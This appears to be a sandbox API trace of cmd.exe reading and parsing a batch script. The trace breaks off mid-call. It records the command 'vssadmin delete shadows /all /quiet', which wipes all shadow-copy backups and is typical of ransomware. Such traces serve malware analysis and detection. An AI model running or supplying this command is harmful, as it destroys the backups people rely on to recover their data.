lpMultiByteStr=0x7ff7dbba9970, cbMultiByte=1, lpWideCharStr=0x7ff7dbbb3c48, cchWideChar=1 | out: lpWideCharStr="eelect=1251\n") returned 1 [0306.876] _get_osfhandle (_FileHandle=0) returned 0x248 [0306.876] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0306.876] ReadFile (in: hFile=0x248, lpBuffer=0x7ff7dbba9970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x202efdf988, lpOverlapped=0x0 | out: lpBuffer=0x7ff7dbba9970*, lpNumberOfBytesRead=0x202efdf988*=0x1, lpOverlapped=0x0) returned 1 [0306.876] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x7ff7dbba9970, cbMultiByte=1, lpWideCharStr=0x7ff7dbbb3c4a, cchWideChar=1 | out: lpWideCharStr="tlect=1251\n") returned 1 [0306.876] _get_osfhandle (_FileHandle=0) returned 0x248 [0306.876] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0306.876] ReadFile (in: hFile=0x248, lpBuffer=0x7ff7dbba9970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x202efdf988, lpOverlapped=0x0 | out: lpBuffer=0x7ff7dbba9970*, lpNumberOfBytesRead=0x202efdf988*=0x1, lpOverlapped=0x0) returned 1 [0306.876] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x7ff7dbba9970, cbMultiByte=1, lpWideCharStr=0x7ff7dbbb3c4c, cchWideChar=1 | out: lpWideCharStr="eect=1251\n") returned 1 [0306.876] _get_osfhandle (_FileHandle=0) returned 0x248 [0306.876] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0306.876] ReadFile (in: hFile=0x248, lpBuffer=0x7ff7dbba9970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x202efdf988, lpOverlapped=0x0 | out: lpBuffer=0x7ff7dbba9970*, lpNumberOfBytesRead=0x202efdf988*=0x1, lpOverlapped=0x0) returned 1 [0306.876] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x7ff7dbba9970, cbMultiByte=1, lpWideCharStr=0x7ff7dbbb3c4e, cchWideChar=1 | out: lpWideCharStr=" ct=1251\n") returned 1 [0306.877] _get_osfhandle (_FileHandle=0) returned 0x248 [0306.877] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0306.877] ReadFile (in: hFile=0x248, lpBuffer=0x7ff7dbba9970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x202efdf988, lpOverlapped=0x0 | out: lpBuffer=0x7ff7dbba9970*, lpNumberOfBytesRead=0x202efdf988*=0x1, lpOverlapped=0x0) returned 1 [0306.877] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x7ff7dbba9970, cbMultiByte=1, lpWideCharStr=0x7ff7dbbb3c50, cchWideChar=1 | out: lpWideCharStr="st=1251\n") returned 1 [0306.877] _get_osfhandle (_FileHandle=0) returned 0x248 [0306.877] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0306.877] ReadFile (in: hFile=0x248, lpBuffer=0x7ff7dbba9970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x202efdf988, lpOverlapped=0x0 | out: lpBuffer=0x7ff7dbba9970*, lpNumberOfBytesRead=0x202efdf988*=0x1, lpOverlapped=0x0) returned 1 [0306.877] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x7ff7dbba9970, cbMultiByte=1, lpWideCharStr=0x7ff7dbbb3c52, cchWideChar=1 | out: lpWideCharStr="h=1251\n") returned 1 [0306.877] _get_osfhandle (_FileHandle=0) returned 0x248 [0306.877] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0306.877] ReadFile (in: hFile=0x248, lpBuffer=0x7ff7dbba9970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x202efdf988, lpOverlapped=0x0 | out: lpBuffer=0x7ff7dbba9970*, lpNumberOfBytesRead=0x202efdf988*=0x1, lpOverlapped=0x0) returned 1 [0306.878] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x7ff7dbba9970, cbMultiByte=1, lpWideCharStr=0x7ff7dbbb3c54, cchWideChar=1 | out: lpWideCharStr="a1251\n") returned 1 [0306.878] _get_osfhandle (_FileHandle=0) returned 0x248 [0306.878] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0306.878] ReadFile (in: hFile=0x248, lpBuffer=0x7ff7dbba9970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x202efdf988, lpOverlapped=0x0 | out: lpBuffer=0x7ff7dbba9970*, lpNumberOfBytesRead=0x202efdf988*=0x1, lpOverlapped=0x0) returned 1 [0306.878] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x7ff7dbba9970, cbMultiByte=1, lpWideCharStr=0x7ff7dbbb3c56, cchWideChar=1 | out: lpWideCharStr="d251\n") returned 1 [0306.878] _get_osfhandle (_FileHandle=0) returned 0x248 [0306.878] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0306.878] ReadFile (in: hFile=0x248, lpBuffer=0x7ff7dbba9970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x202efdf988, lpOverlapped=0x0 | out: lpBuffer=0x7ff7dbba9970*, lpNumberOfBytesRead=0x202efdf988*=0x1, lpOverlapped=0x0) returned 1 [0306.878] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x7ff7dbba9970, cbMultiByte=1, lpWideCharStr=0x7ff7dbbb3c58, cchWideChar=1 | out: lpWideCharStr="o51\n") returned 1 [0306.878] _get_osfhandle (_FileHandle=0) returned 0x248 [0306.878] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0306.878] ReadFile (in: hFile=0x248, lpBuffer=0x7ff7dbba9970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x202efdf988, lpOverlapped=0x0 | out: lpBuffer=0x7ff7dbba9970*, lpNumberOfBytesRead=0x202efdf988*=0x1, lpOverlapped=0x0) returned 1 [0306.879] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x7ff7dbba9970, cbMultiByte=1, lpWideCharStr=0x7ff7dbbb3c5a, cchWideChar=1 | out: lpWideCharStr="w1\n") returned 1 [0306.879] _get_osfhandle (_FileHandle=0) returned 0x248 [0306.879] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0306.879] ReadFile (in: hFile=0x248, lpBuffer=0x7ff7dbba9970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x202efdf988, lpOverlapped=0x0 | out: lpBuffer=0x7ff7dbba9970*, lpNumberOfBytesRead=0x202efdf988*=0x1, lpOverlapped=0x0) returned 1 [0306.879] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x7ff7dbba9970, cbMultiByte=1, lpWideCharStr=0x7ff7dbbb3c5c, cchWideChar=1 | out: lpWideCharStr="s\n") returned 1 [0306.879] _get_osfhandle (_FileHandle=0) returned 0x248 [0306.879] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0306.879] ReadFile (in: hFile=0x248, lpBuffer=0x7ff7dbba9970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x202efdf988, lpOverlapped=0x0 | out: lpBuffer=0x7ff7dbba9970*, lpNumberOfBytesRead=0x202efdf988*=0x1, lpOverlapped=0x0) returned 1 [0306.879] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x7ff7dbba9970, cbMultiByte=1, lpWideCharStr=0x7ff7dbbb3c5e, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0306.879] _get_osfhandle (_FileHandle=0) returned 0x248 [0306.879] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0306.879] ReadFile (in: hFile=0x248, lpBuffer=0x7ff7dbba9970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x202efdf988, lpOverlapped=0x0 | out: lpBuffer=0x7ff7dbba9970*, lpNumberOfBytesRead=0x202efdf988*=0x1, lpOverlapped=0x0) returned 1 [0306.879] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x7ff7dbba9970, cbMultiByte=1, lpWideCharStr=0x7ff7dbbb3c60, cchWideChar=1 | out: lpWideCharStr="/") returned 1 [0306.879] _get_osfhandle (_FileHandle=0) returned 0x248 [0306.879] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0306.880] ReadFile (in: hFile=0x248, lpBuffer=0x7ff7dbba9970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x202efdf988, lpOverlapped=0x0 | out: lpBuffer=0x7ff7dbba9970*, lpNumberOfBytesRead=0x202efdf988*=0x1, lpOverlapped=0x0) returned 1 [0306.880] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x7ff7dbba9970, cbMultiByte=1, lpWideCharStr=0x7ff7dbbb3c62, cchWideChar=1 | out: lpWideCharStr="a") returned 1 [0306.880] _get_osfhandle (_FileHandle=0) returned 0x248 [0306.880] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0306.880] ReadFile (in: hFile=0x248, lpBuffer=0x7ff7dbba9970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x202efdf988, lpOverlapped=0x0 | out: lpBuffer=0x7ff7dbba9970*, lpNumberOfBytesRead=0x202efdf988*=0x1, lpOverlapped=0x0) returned 1 [0306.880] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x7ff7dbba9970, cbMultiByte=1, lpWideCharStr=0x7ff7dbbb3c64, cchWideChar=1 | out: lpWideCharStr="l") returned 1 [0306.880] _get_osfhandle (_FileHandle=0) returned 0x248 [0306.880] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0306.880] ReadFile (in: hFile=0x248, lpBuffer=0x7ff7dbba9970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x202efdf988, lpOverlapped=0x0 | out: lpBuffer=0x7ff7dbba9970*, lpNumberOfBytesRead=0x202efdf988*=0x1, lpOverlapped=0x0) returned 1 [0306.880] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x7ff7dbba9970, cbMultiByte=1, lpWideCharStr=0x7ff7dbbb3c66, cchWideChar=1 | out: lpWideCharStr="l") returned 1 [0306.880] _get_osfhandle (_FileHandle=0) returned 0x248 [0306.880] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0306.880] ReadFile (in: hFile=0x248, lpBuffer=0x7ff7dbba9970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x202efdf988, lpOverlapped=0x0 | out: lpBuffer=0x7ff7dbba9970*, lpNumberOfBytesRead=0x202efdf988*=0x1, lpOverlapped=0x0) returned 1 [0306.880] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x7ff7dbba9970, cbMultiByte=1, lpWideCharStr=0x7ff7dbbb3c68, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0306.880] _get_osfhandle (_FileHandle=0) returned 0x248 [0306.880] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0306.881] ReadFile (in: hFile=0x248, lpBuffer=0x7ff7dbba9970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x202efdf988, lpOverlapped=0x0 | out: lpBuffer=0x7ff7dbba9970*, lpNumberOfBytesRead=0x202efdf988*=0x1, lpOverlapped=0x0) returned 1 [0306.881] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x7ff7dbba9970, cbMultiByte=1, lpWideCharStr=0x7ff7dbbb3c6a, cchWideChar=1 | out: lpWideCharStr="/") returned 1 [0306.881] _get_osfhandle (_FileHandle=0) returned 0x248 [0306.881] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0306.881] ReadFile (in: hFile=0x248, lpBuffer=0x7ff7dbba9970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x202efdf988, lpOverlapped=0x0 | out: lpBuffer=0x7ff7dbba9970*, lpNumberOfBytesRead=0x202efdf988*=0x1, lpOverlapped=0x0) returned 1 [0306.881] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x7ff7dbba9970, cbMultiByte=1, lpWideCharStr=0x7ff7dbbb3c6c, cchWideChar=1 | out: lpWideCharStr="q") returned 1 [0306.881] _get_osfhandle (_FileHandle=0) returned 0x248 [0306.881] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0306.881] ReadFile (in: hFile=0x248, lpBuffer=0x7ff7dbba9970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x202efdf988, lpOverlapped=0x0 | out: lpBuffer=0x7ff7dbba9970*, lpNumberOfBytesRead=0x202efdf988*=0x1, lpOverlapped=0x0) returned 1 [0306.881] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x7ff7dbba9970, cbMultiByte=1, lpWideCharStr=0x7ff7dbbb3c6e, cchWideChar=1 | out: lpWideCharStr="u") returned 1 [0306.881] _get_osfhandle (_FileHandle=0) returned 0x248 [0306.881] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0306.881] ReadFile (in: hFile=0x248, lpBuffer=0x7ff7dbba9970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x202efdf988, lpOverlapped=0x0 | out: lpBuffer=0x7ff7dbba9970*, lpNumberOfBytesRead=0x202efdf988*=0x1, lpOverlapped=0x0) returned 1 [0306.881] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x7ff7dbba9970, cbMultiByte=1, lpWideCharStr=0x7ff7dbbb3c70, cchWideChar=1 | out: lpWideCharStr="i") returned 1 [0306.881] _get_osfhandle (_FileHandle=0) returned 0x248 [0306.881] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0306.881] ReadFile (in: hFile=0x248, lpBuffer=0x7ff7dbba9970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x202efdf988, lpOverlapped=0x0 | out: lpBuffer=0x7ff7dbba9970*, lpNumberOfBytesRead=0x202efdf988*=0x1, lpOverlapped=0x0) returned 1 [0306.882] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x7ff7dbba9970, cbMultiByte=1, lpWideCharStr=0x7ff7dbbb3c72, cchWideChar=1 | out: lpWideCharStr="e") returned 1 [0306.882] _get_osfhandle (_FileHandle=0) returned 0x248 [0306.882] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0306.882] ReadFile (in: hFile=0x248, lpBuffer=0x7ff7dbba9970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x202efdf988, lpOverlapped=0x0 | out: lpBuffer=0x7ff7dbba9970*, lpNumberOfBytesRead=0x202efdf988*=0x1, lpOverlapped=0x0) returned 1 [0306.882] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x7ff7dbba9970, cbMultiByte=1, lpWideCharStr=0x7ff7dbbb3c74, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0306.882] _get_osfhandle (_FileHandle=0) returned 0x248 [0306.882] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0306.882] ReadFile (in: hFile=0x248, lpBuffer=0x7ff7dbba9970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x202efdf988, lpOverlapped=0x0 | out: lpBuffer=0x7ff7dbba9970*, lpNumberOfBytesRead=0x202efdf988*=0x1, lpOverlapped=0x0) returned 1 [0306.882] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x7ff7dbba9970, cbMultiByte=1, lpWideCharStr=0x7ff7dbbb3c76, cchWideChar=1 | out: lpWideCharStr="\n") returned 1 [0306.882] _get_osfhandle (_FileHandle=0) returned 0x248 [0306.882] GetFileType (hFile=0x248) returned 0x3 [0306.882] _get_osfhandle (_FileHandle=0) returned 0x248 [0306.882] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0306.882] _get_osfhandle (_FileHandle=1) returned 0x254 [0306.882] GetFileType (hFile=0x254) returned 0x3 [0306.883] _get_osfhandle (_FileHandle=1) returned 0x254 [0306.883] WideCharToMultiByte (in: CodePage=0x4e3, dwFlags=0x0, lpWideCharStr="vssadmin delete shadows /all /quiet\n", cchWideChar=-1, lpMultiByteStr=0x7ff7dbba9970, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="vssadmin delete shadows /all /quiet\n", lpUsedDefaultChar=0x0) returned 37 [0306.883] WriteFile (in: hFile=0x254, lpBuffer=0x7ff7dbba9970*, nNumberOfBytesToWrite=0x24, lpNumberOfBytesWritten=0x202efdf928, lpOverlapped=0x0 | out: lpBuffer=0x7ff7dbba9970*, lpNumberOfBytesWritten=0x202efdf928*=0x24, lpOverlapped=0x0) returned 1 [0306.883] GetProcessHeap () returned 0x1b843bf0000 [0306.883] RtlAllocateHeap (HeapHandle=0x1b843bf0000, Flags=0x8, Size=0x4012) returned 0x1b843bf8e90 [0306.883] GetProcessHeap () returned 0x1b843bf0000 [0306.883] RtlFreeHeap (HeapHandle=0x1b843bf0000, Flags=0x0, BaseAddress=0x1b843bf8e90) returned 1 [0306.885] _wcsicmp (_String1="vssadmin", _String2=")") returned 77 [0306.885] _wcsicmp (_String1="FOR", _String2="vssadmin") returned -16 [0306.885] _wcsicmp (_String1="FOR/?", _String2="vssadmin") returned -16 [0306.885] _wcsicmp (_String1="IF", _String2="vssadmin") returned -13 [0306.885] _wcsicmp (_String1="IF/?", _String2="vssadmin") returned -13 [0306.885] _wcsicmp (_String1="REM", _String2="vssadmin") returned -4 [0306.885] _wcsicmp (_String1="REM/?", _String2="vssadmin") returned -4 [0306.885] GetProcessHeap () returned 0x1b843bf0000 [0306.885] RtlAllocateHeap (HeapHandle=0x1b843bf0000, Flags=0x8, Size=0xb0) returned 0x1b843bf7340 [0306.885] GetProcessHeap () returned 0x1b843bf0000 [0306.885] RtlAllocateHeap (HeapHandle=0x1b843bf0000, Flags=0x8, Size=0x22) returned 0x1b843bf6490 [0306.886] GetProcessHeap () returned 0x1b843bf0000 [0306.886] RtlAllocateHeap (HeapHandle=0x1b843bf0000, Flags=0x8, Size=0x48) returned 0x1b843bf75e0 [0306.887] GetConsoleOutputCP () returned 0x4e3 [0307.826] GetCPInfo (in: CodePage=0x4e3, lpCPInfo=0x7ff7dbbafbb0 | out: lpCPInfo=0x7ff7dbbafbb0) returned 1 [0307.826] SetThreadUILanguage (LangId=0x0) returned 0x409 [0308.472] GetConsoleTitleW (in: lpConsoleTitle=0x202efdf770, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\system32\\cmd.exe") returned 0x1c [0308.806] malloc (_Size=0xffce) returned 0x1b843de0840 [0308.807] ??_V@YAXPEAX@Z () returned 0x1b843de0840 [0308.807] malloc (_Size=0xffce) returned 0x1b843df0820 [0308.807] ??_V@YAXPEAX@Z () returned 0x1b843df0820 [0308.807] _wcsicmp (_String1="vssadmin", _String2="DIR") returned 18 [0308.807] _wcsicmp (_String1="vssadmin", _String2="ERASE") returned 17 [0308.807] _wcsicmp (_String1="vssadmin", _String2="DEL") returned 18 [0308.807] _wcsicmp (_String1="vssadmin", _String2="TYPE") returned 2 [0308.807] _wcsicmp (_String1="vssadmin", _String2="COPY") returned 19 [0308.807] _wcsicmp (_String1="vssadmin", _String2="CD") returned 19 [0308.807] _wcsicmp (_String1="vssadmin", _String2="CHDIR") returned 19 [0308.807] _wcsicmp (_String1="vssadmin", _String2="RENAME") returned 4 [0308.807] _wcsicmp (_String1="vssadmin", _String2="REN") returned 4 [0308.807] _wcsicmp (_String1="vssadmin", _String2="ECHO") returned 17 [0308.807] _wcsicmp (_String1="vssadmin", _String2="SET") returned 3 [0308.807] _wcsicmp (_String1="vssadmin", _String2="PAUSE") returned 6 [0308.808] _wcsicmp (_String1="vssadmin", _String2="DATE") returned 18 [0308.808] _wcsicmp (_String1="vssadmin", _String2="TIME") returned 2 [0308.808] _wcsicmp (_String1="vssadmin", _String2="PROMPT") returned 6 [0308.808] _wcsicmp (_String1="vssadmin", _String2="MD") returned 9 [0308.808] _wcsicmp (_String1="vssadmin", _String2="MKDIR") returned 9 [0308.808] _wcsicmp (_String1="vssadmin", _String2="RD") returned 4 [0308.808] _wcsicmp (_String1="vssadmin", _String2="RMDIR") returned 4 [0308.808] _wcsicmp (_String1="vssadmin", _String2="PATH") returned 6 [0308.808] _wcsicmp (_String1="vssadmin", _String2="GOTO") returned 15 [0308.808] _wcsicmp (_String1="vssadmin", _String2="SHIFT") returned 3 [0308.808] _wcsicmp (_String1="vssadmin", _String2="CLS") returned 19 [0308.808] _wcsicmp (_String1="vssadmin", _String2="CALL") returned 19 [0308.808] _wcsicmp (_String1="vssadmin", _String2="VERIFY") returned 14 [0308.808] _wcsicmp (_String1="vssadmin", _String2="VER") returned 14 [0308.808] _wcsicmp (_String1="vssadmin", _String2="VOL") returned 4 [0308.808] _wcsicmp (_String1="vssadmin", _String2="EXIT") returned 17 [0308.808] _wcsicmp (_String1="vssadmin", _String2="SETLOCAL") returned 3 [0308.808] _wcsicmp (_String1="vssadmin", _String2="ENDLOCAL") returned 17 [0308.808] _wcsicmp (_String1="vssadmin", _String2="TITLE") returned 2 [0308.808] _wcsicmp (_String1="vssadmin", _String2="START") returned 3 [0308.808] _wcsicmp (_String1="vssadmin", _String2="DPATH") returned 18 [0308.808] _wcsicmp (_String1="vssadmin", _String2="KEYS") returned 11 [0308.808] _wcsicmp (_String1="vssadmin", _String2="MOVE") returned 9 [0308.808] _wcsicmp (_String1="vssadmin", _String2="PUSHD") returned 6 [0308.808] _wcsicmp (_String1="vssadmin", _String2="POPD") returned 6 [0308.809] _wcsicmp (_String1="vssadmin", _String2="ASSOC") returned 21 [0308.809] _wcsicmp (_String1="vssadmin", _String2="FTYPE") returned 16 [0308.809] _wcsicmp (_String1="vssadmin", _String2="BREAK") returned 20 [0308.809] _wcsicmp (_String1="vssadmin", _String2="COLOR") returned 19 [0308.809] _wcsicmp (_String1="vssadmin", _String2="MKLINK") returned 9 [0308.809] _wcsicmp (_String1="vssadmin", _String2="DIR") returned 18 [0308.809] _wcsicmp (_String1="vssadmin", _String2="ERASE") returned 17 [0308.809] _wcsicmp (_String1="vssadmin", _String2="DEL") returned 18 [0308.809] _wcsicmp (_String1="vssadmin", _String2="TYPE") returned 2 [0308.809] _wcsicmp (_String1="vssadmin", _String2="COPY") returned 19 [0308.809] _wcsicmp (_String1="vssadmin", _String2="CD") returned 19 [0308.809] _wcsicmp (_String1="vssadmin", _String2="CHDIR") returned 19 [0308.809] _wcsicmp (_String1="vssadmin", _String2="RENAME") returned 4 [0308.809] _wcsicmp (_String1="vssadmin", _String2="REN") returned 4 [0308.809] _wcsicmp (_String1="vssadmin", _String2="ECHO") returned 17 [0308.809] _wcsicmp (_String1="vssadmin", _String2="SET") returned 3 [0308.809] _wcsicmp (_String1="vssadmin", _String2="PAUSE") returned 6 [0308.809] _wcsicmp (_String1="vssadmin", _String2="DATE") returned 18 [0308.809] _wcsicmp (_String1="vssadmin", _String2="TIME") returned 2 [0308.809] _wcsicmp (_String1="vssadmin", _String2="PROMPT") returned 6 [0308.809] _wcsicmp (_String1="vssadmin", _String2="MD") returned 9 [0308.809] _wcsicmp (_String1="vssadmin", _String2="MKDIR") returned 9 [0308.809] _wcsicmp (_String1="vssadmin", _String2="RD") returned 4 [0308.809] _wcsicmp (_String1="vssadmin", _String2="RMDIR") returned 4 [0308.809] _wcsicmp (_String1="vssadmin", _String2="PATH") returned 6 [0308.809] _wcsicmp (_String1="vssadmin", _String2="GOTO") returned 15 [0308.810] _wcsicmp (_String1="vssadmin", _String2="SHIFT") returned 3 [0308.810] _wcsicmp (_String1="vssadmin", _String2="CLS") returned 19 [0308.810] _wcsicmp (_String1="vssadmin", _String2="CALL") returned 19 [0308.810] _wcsicmp (_String1="vssadmin", _String2="VERIFY") returned 14 [0308.810] _wcsicmp (_String1="vssadmin", _String2="VER") returned 14 [0308.810] _wcsicmp (_String1="vssadmin", _String2="VOL") returned 4 [0308.810] _wcsicmp (_String1="vssadmin", _String2="EXIT") returned 17 [0308.810] _wcsicmp (_String1="vssadmin", _String2="SETLOCAL") returned 3 [0308.810] _wcsicmp (_String1="vssadmin", _String2="ENDLOCAL") returned 17 [0308.810] _wcsicmp (_String1="vssadmin", _String2="TITLE") returned 2 [0308.810] _wcsicmp (_String1="vssadmin", _String2="START") returned 3 [0308.810] _wcsicmp (_String1="vssadmin", _String2="DPATH") returned 18 [0308.810] _wcsicmp (_String1="vssadmin", _String2="KEYS") returned 11 [0308.810] _wcsicmp (_String1="vssadmin", _String2="MOVE") returned 9 [0308.810] _wcsicmp (_String1="vssadmin", _String2="PUSHD") returned 6 [0308.810] _wcsicmp (_String1="vssadmin", _String2="POPD") returned 6 [0308.810] _wcsicmp (_String1="vssadmin", _String2="ASSOC") returned 21 [0308.810] _wcsicmp (_String1="vssadmin", _String2="FTYPE") returned 16 [0308.810] _wcsicmp (_String1="vssadmin", _String2="BREAK") returned 20 [0308.810] _wcsicmp (_String1="vssadmin", _String2="COLOR") returned 19 [0308.810] _wcsicmp (_String1="vssadmin", _String2="MKLINK") returned 9 [0308.810] _wcsicmp (_String1="vssadmin", _String2="FOR") returned 16 [0308.810] _wcsicmp (_String1="vssadmin", _String2="IF") returned 13 [0308.810] _wcsicmp (_String1="vssadmin", _String2="REM") returned 4 [0308.811] ??_V@YAXPEAX@Z () returned 0x1 [0308.811] GetProcessHeap () returned 0x1b843bf0000 [0308.811] RtlAllocateHeap (HeapHandle=0x1b843bf0000, Flags=0x8, Size=0xffde) returned 0x1b843bf8e90 [0308.814] GetProcessHeap () returned 0x1b843bf0000 [0308.814] RtlAllocateHeap (HeapHandle=0x1b843bf0000, Flags=0x8, Size=0x5a) returned 0x1b843bf77c0 [0308.814] _wcsnicmp (_String1="vssa", _String2="cmd ", _MaxCount=0x4) returned 19 [0308.814] malloc (_Size=0xffce) returned 0x1b843df0820 [0308.814] ??_V@YAXPEAX@Z () returned 0x1b843df0820 [0308.814] GetProcessHeap () returned 0x1b843bf0000 [0308.814] RtlAllocateHeap (HeapHandle=0x1b843bf0000, Flags=0x8, Size=0x1ffac) returned 0x1b843c0aac0 [0308.818] SetErrorMode (uMode=0x0) returned 0x0 [0308.818] SetErrorMode (uMode=0x1) returned 0x0 [0308.818] GetFullPathNameW (in: lpFileName=".", nBufferLength=0xffce, lpBuffer=0x1b843c0aad0, lpFilePart=0x202efdeff0 | out: 